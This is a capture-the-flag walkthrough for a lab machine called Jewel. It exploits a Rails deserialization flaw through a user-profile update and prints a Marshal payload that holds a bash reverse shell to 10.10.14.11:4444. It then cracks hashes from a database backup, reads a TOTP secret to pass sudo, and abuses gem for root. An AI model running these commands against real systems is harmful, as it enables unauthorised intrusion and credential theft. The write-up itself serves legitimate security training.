Jewel
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.211 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,8000,8080 10.10.10.211 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
There are two websites. The on on port 8000 shows a Git page with a project called BL0G!.
The other website on port 8080, shows the blog itself.
We can download the entire project by hitting the snapshot button next to Initial commit.
Now, I will decompress the .tar.gz file, and rename the project to git.
tar -xf git-5d6f436.tar.gz
mv .git-5d6f436 git
We could execute the brakeman tool, which is a static analysis security vulnerability scanner for Ruby on Rails applications.
brakeman
We'll see that the application runs rails 5.2.2.1. I found this exploit which allow us to get RCE on the server. First, we'll have to create a new project with rails called evil.
rails new evil
Then, execute the rails console.
bundle exec rails console
Set the code variable to a command which will send us a reverse shell.
code = '`bash -c "bash -i >& /dev/tcp/10.10.14.11/4444 0>&1"`'
Run the following commands.
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
puts "payload"
require 'uri'
puts URI.encode_www_form(payload: payload)
Now that we have the proper payload, we need to find where to execute it. The vulnerability exploits the following code.
If we check for raw: true on all the project file, we'll see it appears in two files.
grep -r "raw: true"
Those files control the website users. So we may have to register a new user.
Then, log in.
The go to the Profile section, click on the Update User, and intercept the request with BurpSuite.
Before modifying the request, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Now, modify the request by putting the payload in the user[username] or user%5Busername%5D parameter.
If now we forward the request, and reload the page, we should get a reverse shell as the bill user. Then, we'll be able to grab the user flag.
http://10.10.10.211:8080/users/18
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
By enumerating the system, I found the /var/backups/dump_2020-08-27.sql file with some passwords hashes.
cat /var/backups/dump_2020-08-27.sql
Let's put those hashes in a file, and try to break them with john.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
We can only break one, which is valid for the bill user, so now we can see his sudo privileges.
sudo -l
The system is asking for a verification code. If we take a look at the home directory of the bill user, we'll see the .google_authenticator file with the .
ls -la /home/bill
The .google_authenticator file contains the TOTP key necessary to get the verification code.
cat /home/bill/.google_authenticator
Now we can use oathtool to get the verification code.
oathtool -b --totp 2UQI3R52WFCLE6JTLDCSJYMJH4
Now we can see the sudo privileges.
sudo -l
To get a shell as root, run the following command, and then all we have to do is reap the harvest and take the root flag.
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
We can execute gem as root. If we search for on the GTFOBins list, we'll see that we can spawn a shell as the root user.
